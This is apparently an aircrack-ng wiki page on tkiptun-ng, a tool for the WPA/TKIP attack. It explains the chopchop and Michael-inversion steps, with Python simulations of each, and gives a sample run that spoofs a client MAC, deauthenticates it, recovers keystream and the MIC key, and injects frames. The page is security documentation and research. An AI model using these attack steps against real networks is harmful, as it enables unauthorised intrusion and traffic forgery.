Revision history: tkiptun-ng [2008/11/06 20:25] – added link to instructions to install it (mister_x); tkiptun-ng [2009/08/10 21:50] – Added link to Cryptanalysis of IEEE 802.11i TKIP paper (darkaudax)
====== Tkiptun-ng ======

===== Description =====

NOTE: This documentation is still under development. Please check back on a regular basis to obtain the latest updates. If you have any feedback on the documentation, please post your comments to the [[http://forum.aircrack-ng.org|Forum]].

**IMPORTANT NOTE:** The tkiptun-ng SVN version is not fully working. The final attack phase is not yet implemented. The other portions are working with the ieee80211 drivers for RT73 and RTL8187L chipsets. The madwifi-ng driver is definitely broken and is known to completely fail. tkiptun-ng may work with other drivers but has not been tested, so your mileage may vary.

Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of the aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS. He worked with Erik Tews (who created the PTW attack) for a conference at [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA".

Tkiptun-ng is the proof-of-concept implementation of the WPA/TKIP attack. This attack is described in the paper [[http://dl.aircrack-ng.org/breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews. The paper describes advanced attacks on WEP and the first practical attack on WPA. An additional excellent reference explaining how tkiptun-ng does its magic is this Ars Technica article, [[http://arstechnica.com/security/news/2008/11/wpa-cracked.ars/|Battered, but not broken: understanding the WPA crack]] by Glenn Fleishman.

Basically, tkiptun-ng starts by obtaining the plaintext of a small packet and its MIC (Message Integrity Check). This is done via a [[chopchoptheory|chopchop]]-type method: the last byte of the captured frame is chopped off, and each of the 256 possible values of that byte is tested by reinjecting the truncated frame with a corrected ICV. On TKIP the client's MIC failure report is the oracle that confirms the right guess, and because of the MIC countermeasures only one guess can be tested per minute, which is why the attack is slow. Once the plaintext and MIC are known, the Michael algorithm is reversed (Michael is invertible given a plaintext and its MIC) and the MIC key used to protect packets sent from the AP to the client can be calculated.
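The chopchop step above, as an added simulation (this is example code written for this page, not part of tkiptun-ng or aireplay-ng): a frame of the form body || ICV is encrypted under a constructed keystream, a stand-in receiver that only checks the CRC-32 ICV plays the oracle, and the attacker chops one byte at a time, computing for each of the 256 guesses the four-byte correction that makes the truncated frame's ICV valid again. The LLC/SNAP header, payload and keystream are constructed; the 60-second wait between guesses and the MIC failure report that form the real TKIP oracle are not modelled.

```python
# Added example, not aircrack-ng code: one chopchop run against a CRC-32 ICV.
import random
import zlib

# Reflected CRC-32 table (polynomial 0xEDB88320), the CRC the 802.11 ICV uses.
CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    CRC_TABLE.append(_c)

# The top byte of a table entry identifies the entry uniquely; chopchop relies on this.
TOP_TO_INDEX = {t >> 24: i for i, t in enumerate(CRC_TABLE)}
assert len(TOP_TO_INDEX) == 256


def icv(data: bytes) -> bytes:
    """802.11 ICV: CRC-32 of the plaintext body, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def chop_correction(guess: int) -> bytes:
    """XOR mask for the last four bytes of a frame whose final byte was chopped,
    assuming that byte decrypted to `guess`.

    With R the CRC register of the full body and R' that of the shortened body,
    R = (R' >> 8) ^ T[i] where i = (R' ^ b) & 0xFF. The top byte of R is the
    chopped ICV byte (inverted), so the guess fixes i, and the mask turns the
    bytes b || ICV[0:3] into the ICV of the shortened body without knowing R.
    """
    i = TOP_TO_INDEX[guess ^ 0xFF]
    t = CRC_TABLE[i]
    return bytes([i ^ 0xFF, t & 0xFF, (t >> 8) & 0xFF, (t >> 16) & 0xFF])


class Receiver:
    """Constructed stand-in for the client: decrypts and checks the ICV only."""

    def __init__(self, keystream: bytes):
        self._keystream = keystream

    def accepts(self, frame: bytes) -> bool:
        plaintext = xor(frame, self._keystream)
        return len(frame) > 4 and icv(plaintext[:-4]) == plaintext[-4:]


def chopchop(frame: bytes, oracle, nbytes: int):
    """Recover the last `nbytes` keystream and plaintext bytes of `frame`.

    Returns two dicts keyed by offset: keystream byte and original plaintext
    byte, the "xor" and "pt" columns of the tkiptun-ng output.
    """
    keystream, plaintext = {}, {}
    current = frame
    for _ in range(nbytes):
        offset = len(current) - 1
        chopped = current[:-1]
        for guess in range(256):
            candidate = chopped[:-4] + xor(chopped[-4:], chop_correction(guess))
            if oracle(candidate):
                # `guess` is the plaintext of the chopped byte of the *current*
                # frame, so it reveals the keystream byte at this offset, and
                # with it the original frame's plaintext at the same offset.
                keystream[offset] = current[offset] ^ guess
                plaintext[offset] = frame[offset] ^ keystream[offset]
                current = candidate
                break
        else:
            raise RuntimeError("no guess accepted at offset %d" % offset)
    return keystream, plaintext


def demo(nbytes: int = 12, seed: int = 7):
    """Constructed frame: LLC/SNAP header plus random payload, body || ICV,
    encrypted with a random keystream. Returns (all bytes correct, plaintext)."""
    rng = random.Random(seed)
    body = bytes.fromhex("aaaa030000000806") + bytes(rng.randrange(256) for _ in range(20))
    keystream = bytes(rng.randrange(256) for _ in range(len(body) + 4))
    frame = xor(body + icv(body), keystream)
    ks, pt = chopchop(frame, Receiver(keystream).accepts, nbytes)
    truth = body + icv(body)
    ok = all(ks[o] == keystream[o] for o in ks) and all(pt[o] == truth[o] for o in pt)
    return ok, pt
```

The first four offsets recovered are the ICV itself, the next bytes are the tail of the body; on a real TKIP frame the eight bytes before the ICV are the Michael MIC, which is why the usage example below starts at offset 99 of a 100-byte packet and works downwards.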

At this point, tkiptun-ng has recovered the MIC key and knows a keystream for access point to client communication. Subsequently, using the XOR file, you can create new packets and inject them. The creation and injection are done using the other aircrack-ng suite tools.
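The MIC key recovery above, as an added example (written for this page; it is not tkiptun-ng's own code): Michael from IEEE 802.11i implemented forwards, then run backwards. Michael loads the 64-bit key into its two-word state and mixes in each message word through a block function built only from XORs, rotates and modular adds, so every step is invertible and the key falls out of one plaintext and its MIC. The client and AP addresses are taken from the usage example below; the ARP body and the MIC key are constructed, and the AP-to-client (FromDS) direction matches the key tkiptun-ng reports.

```python
# Added example, not aircrack-ng code: Michael MIC and its inversion.
import os
import struct

MASK = 0xFFFFFFFF


def rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def ror(x, n):
    return rol(x, 32 - n)


def xswap(x):
    """Swap the bytes within each 16-bit half of a word."""
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def block(l, r):
    """Michael block function b(L, R) from IEEE 802.11i."""
    r ^= rol(l, 17)
    l = (l + r) & MASK
    r ^= xswap(l)
    l = (l + r) & MASK
    r ^= rol(l, 3)
    l = (l + r) & MASK
    r ^= ror(l, 2)
    l = (l + r) & MASK
    return l, r


def block_inv(l, r):
    """Exact inverse of block(): undo the steps in reverse order."""
    l = (l - r) & MASK
    r ^= ror(l, 2)
    l = (l - r) & MASK
    r ^= rol(l, 3)
    l = (l - r) & MASK
    r ^= xswap(l)
    l = (l - r) & MASK
    r ^= rol(l, 17)
    return l, r


def padded_words(msg: bytes):
    """Append 0x5a and 4..7 zero bytes, then split into little-endian words."""
    msg += b"\x5a"
    msg += b"\x00" * (4 + (-(len(msg) + 4) % 4))
    return struct.unpack("<%dI" % (len(msg) // 4), msg)


def michael(key: bytes, msg: bytes) -> bytes:
    l, r = struct.unpack("<II", key)
    for w in padded_words(msg):
        l ^= w
        l, r = block(l, r)
    return struct.pack("<II", l, r)


def michael_key_from_plaintext(msg: bytes, mic: bytes) -> bytes:
    """What tkiptun-ng does once chopchop has handed it plaintext and MIC:
    start from the MIC and walk the blocks backwards to the initial state."""
    l, r = struct.unpack("<II", mic)
    for w in reversed(padded_words(msg)):
        l, r = block_inv(l, r)
        l ^= w
    return struct.pack("<II", l, r)


def tkip_mic_input(da: bytes, sa: bytes, priority: int, msdu: bytes) -> bytes:
    """TKIP computes the MIC over DA || SA || priority || 3 zero bytes || MSDU."""
    return da + sa + bytes([priority & 0x0F, 0, 0, 0]) + msdu


def demo():
    """Constructed AP -> client ARP frame under a random MIC key.
    Returns (true key, key recovered from plaintext and MIC)."""
    key = os.urandom(8)                     # constructed FromDS MIC key
    da = bytes.fromhex("000fb5abcb9d")      # client, from the usage example
    sa = bytes.fromhex("00146c7e4080")      # AP (BSSID), from the usage example
    arp = bytes.fromhex("aaaa030000000806") + bytes(28)  # LLC/SNAP + zeroed ARP body
    plaintext = tkip_mic_input(da, sa, 0, arp)
    mic = michael(key, plaintext)
    return key, michael_key_from_plaintext(plaintext, mic)
```

Note what this does not give: the recovered key only authenticates frames in the AP-to-client direction (TKIP uses a separate MIC key per direction), and forging a frame still requires a keystream for the chosen TSC, which is why the attack injects only a few short frames using the XOR file.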

[[http://wiki-files.aircrack-ng.org/doc/tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009, provides an excellent detailed description of how tkiptun-ng works. Their paper also includes detailed descriptions of many other attacks against WEP/WPA/WPA2.

Please remember this is an extremely advanced attack. You require advanced Linux and aircrack-ng skills to use this tool. DO NOT EXPECT support unless you can demonstrate you have these skills. Novices will NOT BE SUPPORTED.

===== General Requirements =====

Both the AP and the client must support QoS (on some APs this is called Wi-Fi Multimedia, WMM).

The AP must be configured for WPA with TKIP.

A fairly long rekeying interval must be in use, such as 3600 seconds. It should be at least 20 minutes, since the whole attack has to complete before the temporal keys change.


===== Specific Requirements =====

The MAC address of the network card used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.


===== Why? =====

This section is very preliminary. As tkiptun-ng runs, it goes through various phases, and people ask "Why is such and such done?". This section attempts to answer those questions.

**Question:** \\
Why is the handshake gathered?

**Answer:** \\
It is done for debugging reasons. First, so that the temporal keys can be calculated in tkiptun-ng (the PMK or PSK supplied with -P or -p is needed for that). Second, to check them against the values calculated from the plaintext packet.

Another reason is to check whether the AP/client reuses the nonces after a MIC shutdown.

===== Usage =====

Usage: tkiptun-ng <options> <replay interface>

Filter options:

* -d dmac : MAC address, Destination
* -s smac : MAC address, Source
* -m len : minimum packet length
* -n len : maximum packet length
* -t tods : frame control, To DS bit
* -f fromds : frame control, From DS bit
* -D : disable AP detection

Replay options:

* -x nbpps : number of packets per second
* -a bssid : set Access Point MAC address
* -c dmac : set Destination MAC address
* -h smac : set Source MAC address
* -F : choose first matching packet
* -e essid : set target AP SSID

Debug options:

* -K prga : keystream for continuation
* -y file : keystream-file for continuation
* -j : inject FromDS packets
* -P pmk : pmk for verification/vuln testing
* -p psk : psk to calculate pmk with essid

Source options:

* -i iface : capture packets from this interface
* -r file : extract packets from this pcap file

* --help : Displays this usage screen


===== Usage Examples =====

The example below is incomplete but it gives some idea of how it looks.

Input:

tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0

Output:

The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
15:06:48 Michael Test: Successful
15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
15:06:48 Found specified AP
15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured
15:06:56 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0305-150705.cap
15:07:05 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0305-150705.cap
15:07:05 Got the answer!
15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.

15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms
15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms
15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms
15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms
15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms
15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms
15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms
15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91829ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms
15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms
15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms
15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms
15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms
15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms
15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms
15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms
15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms
15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms
15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms
15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms
15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms
15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms
15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms
15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms
Sleeping for 60 seconds.36 bytes still unknown
ARP Reply
Checking 192.168.x.y
15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66

Saving plaintext in replay_dec-0305-155411.cap
Saving keystream in replay_dec-0305-155411.xor
15:54:11
Completed in 2816s (0.02 bytes/s)

15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42
15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112
15:54:11 Sent encrypted tkip ARP request to the client.
15:54:11 Wait for the mic countermeasure timeout of 60 seconds.


| |
| ===== Usage Tips ===== |
| |
| None at this time. |
| |
| ===== Usage Troubleshooting ===== |
| |
| None at this time. |
| |
===== Installation =====

It is currently only available in our subversion repository. Instructions to install it can be found [[install_aircrack#latest_svn_development_sources|here]].